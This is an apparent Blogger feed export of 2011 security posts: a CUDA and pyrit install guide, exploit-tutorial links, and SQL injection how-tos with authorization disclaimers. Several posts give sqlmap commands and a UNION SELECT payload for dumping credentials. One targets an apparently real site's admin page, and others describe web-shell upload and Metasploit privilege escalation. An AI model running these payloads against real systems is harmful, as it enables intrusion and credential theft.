&lt;code&gt;wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_32_ubuntu10.10.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
64-bit :&lt;br /&gt;
&lt;code&gt;wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_64_ubuntu10.10.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;chmod +x cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run&lt;br /&gt;
./cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(3) Download "&lt;code&gt;GPU Computing SDK&lt;/code&gt;" for the nVidia SDK.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;chmod +x gpucomputingsdk_4.0.17_linux.run&lt;br /&gt;
./gpucomputingsdk_4.0.17_linux.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /root/.bashrc&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;export PATH=$PATH:/usr/local/cuda/bin&lt;br /&gt;
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
After that, reboot the system to make the nVidia driver effect.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Installation of pyrit&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the official site of pyrit.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;http://code.google.com/p/pyrit/downloads/list&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xzvf pyrit-0.4.0.tar.gz&lt;br /&gt;
cd pyrit-0.4.0&lt;br /&gt;
python setup.py build&lt;br /&gt;
python setup.py install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xzvf cpyrit-cuda-0.4.0.tar.gz&lt;br /&gt;
cd cpyrit-cuda-0.4.0&lt;br /&gt;
python setup.py build&lt;br /&gt;
python setup.py install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To test if the installation is correct or not.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;pyrit list_cores&lt;br /&gt;
pyrit benchmark&lt;br /&gt;
pyrit benchmark_long&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="420" height="315" src="http://www.youtube.com/embed/R0EYj_tPSJ0" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8652430468243103558?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8652430468243103558'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8652430468243103558'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/12/howto-backtrack-5-r1-on-intel-x79.html' title='HOWTO : BackTrack 5 R1 on Intel X79 Express chipset and nVidia display card'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/R0EYj_tPSJ0/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5057087768433128898</id><published>2011-12-23T00:48:00.000+08:00</published><updated>2011-12-23T00:48:52.485+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='X79'/><title type='text'>HOWTO : Ubuntu 12.04 LTS on Intel X79 Express Chipset and nVidia Display Card</title><content type='html'>At this writing, Ubuntu 12.04 LTS is still under heavy development and at Alpha 1 stage.&lt;br /&gt;
&lt;br /&gt;
It is no problem to boot Ubuntu 12.04 LTS on Intel X79 Express Chipset due to Kernel version 3.2.&lt;br /&gt;
&lt;br /&gt;
If the system is equipped with nVidia display card, you need to set "&lt;code&gt;nomodeset&lt;/code&gt;" by pressing &lt;code&gt;F6&lt;/code&gt; on the boot up menu of the Live CD of Ubuntu 12.04 LTS.  (Press Enter when "&lt;code&gt;keyboard&lt;/code&gt;" and "&lt;code&gt;human&lt;/code&gt;" figures appear on the bottom on the screen when booting up)&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5057087768433128898?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5057087768433128898'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5057087768433128898'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/12/howto-ubuntu-1204-lts-on-intel-x79.html' title='HOWTO : Ubuntu 12.04 LTS on Intel X79 Express Chipset and nVidia Display Card'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3439437097050310578</id><published>2011-12-10T17:55:00.003+08:00</published><updated>2012-01-12T23:47:46.599+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>Exploit writing tutorial</title><content type='html'>The is the summary of the &lt;a href="https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/"&gt;Corelan's Exploit writing tutorial offical site&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/"&gt;Part 1 : Stack Based Overflows&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/"&gt;Part 2 : Stack Based Overflows - jumping to shellcode&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/"&gt;Part 3 : SEH Based Exploits&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/"&gt;Part 3b : SEH Based Exploits - just another example&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/"&gt;Part 4 : From Exploit to Metasploit - The basic&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/"&gt;Part 5 : How debugger modules &amp; plugins can speed up basic exploit development&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/"&gt;Part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/"&gt;Part 7 : Unicode - from 0x00410041 to calc&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/"&gt;Part 8 : Win32 Egg Hunting&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/"&gt;Part 9 : Introduction to Win32 shellcoding&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/"&gt;Part 10 : Chaining DEP with ROP - the Rubik's Cube&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/"&gt;Part 11 : Heap Spraying Demystified&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3439437097050310578?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3439437097050310578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3439437097050310578'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/12/exploit-writing-tutorial.html' title='Exploit writing tutorial'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1145827282288172430</id><published>2011-09-16T18:54:00.001+08:00</published><updated>2011-09-16T18:56:20.089+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : SQL Injection with SQLmap on Back|Track 5 R1</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to :ruo911&lt;br /&gt;
&lt;br /&gt;
This is ruo911's work but not mine.  I re-post it for educational purpose only.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="653" height="480" src="http://www.youtube.com/embed/ViezR1Qmcns?hd=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /pentest/web/scanners/sqlmap&lt;br /&gt;
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs&lt;br /&gt;
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables&lt;br /&gt;
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns&lt;br /&gt;
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
try login.&lt;br /&gt;
&lt;br /&gt;
p.s&lt;br /&gt;
1. Backtrack 5 R1 - sqlmap&lt;br /&gt;
cd /pentest/database/sqlmap&lt;br /&gt;
&lt;br /&gt;
2. user agent options&lt;br /&gt;
example)&lt;br /&gt;
--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1145827282288172430?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1145827282288172430'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1145827282288172430'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-sql-injection-with-sqlmap-on.html' title='HOWTO : SQL Injection with SQLmap on Back|Track 5 R1'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/ViezR1Qmcns/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1741697218508855684</id><published>2011-09-16T18:53:00.001+08:00</published><updated>2011-09-16T18:56:48.330+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><title type='text'>HOWTO : SQL Injection by tools</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : medmado1990&lt;br /&gt;
&lt;br /&gt;
This is medmado1990's work but not mine.  I re-post it for educational purpose only.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="653" height="480" src="http://www.youtube.com/embed/O7ZcONmX3hY?hd=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="653" height="480" src="http://www.youtube.com/embed/NUe6hSoR-H8?hd=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1741697218508855684?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1741697218508855684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1741697218508855684'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-sql-injection-by-tools.html' title='HOWTO : SQL Injection by tools'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/O7ZcONmX3hY/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5826106524740870408</id><published>2011-09-16T18:52:00.001+08:00</published><updated>2011-09-16T19:11:40.664+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><title type='text'>HOWTO : Blind SQL Injection</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : KFProdigy&lt;br /&gt;
&lt;br /&gt;
This is KFProdigy's work but not mine.  I re-post it for educational purpose only.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="640" height="480" src="http://www.youtube.com/embed/0z1rt9Y-ON0?hd=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="640" height="480" src="http://www.youtube.com/embed/7heQFi59fgU" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
Hello everyone, In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when i say "google dorks", I dont mean that people from google are dorks, i mean actually go to google and search "dork" or "dorks"&lt;br /&gt;
basically its something like "inurl:news.php?id=" or anything along those lines. I hope this helps!&lt;br /&gt;
&lt;br /&gt;
For more tutorials and tools, check out http://sqliunderground.co.cc , I have a really in-depth tutorial on there.&lt;br /&gt;
P.S. This is for educational purposes only.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
THE THINGS I PASTE&lt;br /&gt;
group_concat(table_name)&lt;br /&gt;
&lt;br /&gt;
from information_schema.tables where table_schema=database()--&lt;br /&gt;
&lt;br /&gt;
concat(column,0x3a,column) from table/*&lt;br /&gt;
&lt;br /&gt;
An example would be&lt;br /&gt;
Example.com/index.php?id=-32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5826106524740870408?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5826106524740870408'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5826106524740870408'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-blind-sql-injection.html' title='HOWTO : Blind SQL Injection'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/0z1rt9Y-ON0/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5133890314560252862</id><published>2011-09-15T14:42:00.002+08:00</published><updated>2011-09-15T14:42:43.827+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>Official SQLMap video demo series</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video.html"&gt;HOWTO : Offical SQLMap video demonstration 1&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_15.html"&gt;HOWTO : Offical SQLMap video demonstration 2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_6142.html"&gt;HOWTO : Offical SQLMap video demonstration 3&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_5309.html"&gt;HOWTO : Offical SQLMap video demonstration 4&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_8731.html"&gt;HOWTO : Offical SQLMap video demonstration 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_1310.html"&gt;HOWTO : Offical SQLMap video demonstration 6&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_9414.html"&gt;HOWTO : Offical SQLMap video demonstration 7&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_5282.html"&gt;HOWTO : Offical SQLMap video demonstration 8&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_5257.html"&gt;HOWTO : Offical SQLMap video demonstration 9&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_727.html"&gt;HOWTO : Offical SQLMap video demonstration 10&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_1692.html"&gt;HOWTO : Offical SQLMap video demonstration 11&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_8131.html"&gt;HOWTO : Offical SQLMap video demonstration 12&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5133890314560252862?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5133890314560252862'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5133890314560252862'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/official-sqlmap-video-demo-series.html' title='Official SQLMap video demo series'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-7174273236687934909</id><published>2011-09-15T14:29:00.002+08:00</published><updated>2011-09-15T14:29:47.446+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 12</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/EVjonzEWOVw?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/EVjonzEWOVw?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections, then exploit a database's stored procedure heap-based buffer overflow vulnerability (MS09-004) if it is Microsoft SQL Server 2000 or 2005. sqlmap relies on Metasploit to create the shellcode which gets executed upon successful exploiting of the buffer overflow on the database server and establishes the connection between the user's machine and the database server. &lt;br /&gt;
&lt;br /&gt;
The control is passed over to the Metasploit command line interface where the user can proceed to privilege escalate to SYSTEM by exploiting MS10-015 vulnerability with Meterpreter getsystem command.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/iis/get_int.asp?id=1 --os-bof -v 1 --msf-path ~/software/metasploit&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-7174273236687934909?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7174273236687934909'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7174273236687934909'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_8131.html' title='HOWTO : Offical SQLMap video demonstration 12'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3424968138625565471</id><published>2011-09-15T14:25:00.002+08:00</published><updated>2011-09-15T14:25:55.801+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 11</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 640px"&gt;&lt;param name="movie" value="http://www.youtube.com/v/-1LJTOJRD88?version=3"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/-1LJTOJRD88?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1. &lt;br /&gt;
&lt;br /&gt;
The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band command prompt session between the user's machine and the database server. When the back-end database is MySQL, ASP and PHP languages do not support stacked queries (ASP.NET does though): there is no way to inject different SQL statements in the same HTTP request. &lt;br /&gt;
&lt;br /&gt;
As a result, sqlmap uploads a web shell in a writable directory within the web server document root and uses it to execute the Metasploit payload stager previously created. The out-of-band command prompt session is now established and the control is passed over to the Metasploit command line interface.&lt;br /&gt;
&lt;br /&gt;
Command &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3424968138625565471?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3424968138625565471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3424968138625565471'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-offical-sqlmap-video_1692.html' title='HOWTO : Offical SQLMap video demonstration 11'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-9066839438568062844</id><published>2011-09-15T14:21:00.002+08:00</published><updated>2011-09-15T14:21:52.020+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Offical SQLMap video demonstration 10</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : Bernardo&lt;br /&gt;
&lt;br /&gt;
This is Bernardo's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
Original link is &lt;a href="http://www.youtube.com/user/inquisb#g/u"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
